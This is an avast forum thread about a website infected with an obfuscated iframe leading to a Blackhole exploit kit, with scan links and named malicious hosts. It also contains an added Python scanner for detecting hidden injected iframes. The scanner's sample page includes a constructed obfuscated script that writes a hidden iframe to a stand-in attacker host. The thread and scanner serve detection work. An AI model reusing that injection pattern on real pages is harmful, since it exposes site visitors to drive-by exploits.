Author Topic: Blackhole iFrame still responsive on site as avast Networkshield detects!  (Read 3058 times)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34047
  • malware fighter
See: htxp://urlquery.net/report.php?id=57244
See: htxp://sitecheck.sucuri.net/results/usalii.com/
Get URL:Mal with Networkshield for the iFrame url: bxwtlawdpz.proxydns dot com
Avast keeps us protected,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
The injected iframe's coding is heavily obfuscated (and will not load with some html viewers) and decodes to your generic blackhole exploit kit. Like most, this one also checks for plugin versions to figure out which exploit(s) to use.
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

Hi !Donovan,

Here we see another example as how IDS flags this: htxp://urlquery.net/report.php?id=52339 & htxp://zulu.zscaler.com/submission/show/960d8242bd962bcdcbd5cf2046e1716a-1337442693
Site has an outdated vBulletin version....
htxp://sitecheck.sucuri.net/results/www.ebikeforum.com/  with 9 instances of malware found,
also see Zscaler's external objects scan,
blocked by Google's safebrowsing: htxp://google.com/safebrowsing/diagnostic?site=ebikeforum.com/
with this as original infecting site: htxp://www.checksitesafe.com/site/directmarketinglead-trade.in/  with a red 5/100 score

polonus
« Last Edit: May 19, 2012, 06:29:57 PM by polonus »

Offline Left123

  • There Is No Patch For Human Stupidity.
  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 1048
  • Proud Community Member&Helper.
I'm here to confirm it. The source code was heavily obfuscated, Malzilla did its job though ;D.

Site is detected: http://urlvoid.com/scan/yrdvjt.fartit.com/ .
AMD Athlon(tm) X2 Dual-Core Processor 4200+ - 2.20 GHz,3,00 GB RAM -
Browser:Mozilla Firefox +WOT - SoftWare:CCleaner - Windows 7 32 bit
No Anti-Virus
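The two posts above (!Donovan's note that the injected iframe is heavily obfuscated and decodes to a Blackhole landing page, and Left123's decode with Malzilla) describe a check that can be scripted for the kind of pre-URL scanning polonus mentions later in the thread. The following is an added example written for this page, not code from the thread, from Malzilla or from avast: it unwraps two JavaScript wrappers that injected loaders commonly use (`String.fromCharCode(...)` and `unescape("%XX...")`), then flags any iframe that is hidden from the visitor (1x1 or 0x0 size, `display:none`, `visibility:hidden`, or positioned off-screen). The sample page, the benign video iframe and the host `bad.example.invalid` are constructed for the example; none of the real hostnames from the thread are used.

```python
"""Heuristic scanner for injected, obfuscated, hidden iframes.

Added example (not code from the avast forum thread, Malzilla or avast).
The HTML below is constructed: a page with one visible iframe and one
injected script that writes a hidden iframe via String.fromCharCode and
unescape. The iframe host bad.example.invalid is made up.
"""
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b(.*?)>", re.I | re.S)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+))""")
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
UNESCAPE_RE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)

# Constructed sample page. Decoded, the last <script> writes:
# <iframe src="http://bad.example.invalid/index.php?tp=1" width="1" height="1"
#         style="visibility:hidden"></iframe>
SAMPLE_PAGE = """<html><head><title>Forum</title></head><body>
<h1>Welcome</h1>
<iframe src="https://video.example/embed/123" width="560" height="315"></iframe>
<script>var y = new Date().getFullYear(); document.getElementById("y").innerHTML = y;</script>
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32)+unescape("src%3D%22http%3A%2F%2Fbad.example.invalid%2Findex.php%3Ftp%3D1%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E"));</script>
</body></html>
"""


def js_unescape(s: str) -> str:
    """Mimic JavaScript unescape(): %uXXXX and %XX sequences."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def deobfuscate(js: str):
    """Unwrap fromCharCode/unescape; return (decoded text, wrappers seen)."""
    used = set()

    def fcc(m):
        used.add("String.fromCharCode")
        codes = [n for n in m.group(1).replace(" ", "").split(",") if n]
        return "".join(chr(int(n)) for n in codes)

    def une(m):
        used.add("unescape")
        return js_unescape(m.group(2))

    js = FROMCHARCODE_RE.sub(fcc, js)
    js = UNESCAPE_RE.sub(une, js)
    # Heuristic: treat JS string concatenation between decoded fragments as
    # a single space so the reassembled markup parses as one tag.
    js = re.sub(r"\s*\+\s*", " ", js)
    return js, sorted(used)


def parse_attrs(tag_body: str) -> dict:
    """Attribute name -> value for the inside of an <iframe ...> tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(tag_body)}


def hidden_reasons(attrs: dict) -> list:
    """Why a visitor would never see this iframe (empty list = visible)."""
    reasons = []
    for dim in ("width", "height"):
        num = re.match(r"\d+", attrs.get(dim, ""))
        if num and int(num.group()) <= 1:
            reasons.append(f"{dim}={attrs[dim]}")
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style:
        reasons.append("display:none")
    if "visibility:hidden" in style:
        reasons.append("visibility:hidden")
    if re.search(r"(left|top):-\d", style):
        reasons.append("off-screen position")
    return reasons


def scan_html(page: str) -> list:
    """Report every iframe, in plain HTML and inside decoded scripts."""
    findings = []

    def collect(fragment, source, wrappers):
        for m in IFRAME_RE.finditer(fragment):
            attrs = parse_attrs(m.group(1))
            reasons = hidden_reasons(attrs)
            findings.append({"src": attrs.get("src", ""), "source": source,
                             "wrappers": wrappers, "reasons": reasons,
                             "hidden": bool(reasons)})

    collect(SCRIPT_RE.sub("", page), "html", [])
    for m in SCRIPT_RE.finditer(page):
        decoded, wrappers = deobfuscate(m.group(1))
        collect(decoded, "script", wrappers)
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        flag = "HIDDEN" if f["hidden"] else "visible"
        print(f"{flag:8} {f['source']:6} {f['src']}  {f['reasons']} {f['wrappers']}")
```

The decoder only handles the two wrappers shown; real Blackhole loaders of that period often stacked further layers (custom character substitution, `eval` of a rebuilt string), which is where an emulating decoder like Malzilla takes over. The hidden-iframe test is the useful part regardless of how the markup was produced, because a legitimate site has no reason to embed a third-party page at 1x1 pixels.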

Offline !Donovan

Hi Polonus,

2 different exploit algorithms and 2 different malicious websites. The site needs to remove the scripts, change their passwords, and step up their security.


----

CheckSiteSafe looks like, and has features related to, Webutation? ???

Offline polonus

Hi Left123 & !Donovan,

I really would like to thank you guys for digging into this, both of you.
A further thanks to all who contribute here in these threads;
we are growing into an important knowledge base
on how to perform pre-URL scanning to aid avast detection,

polonus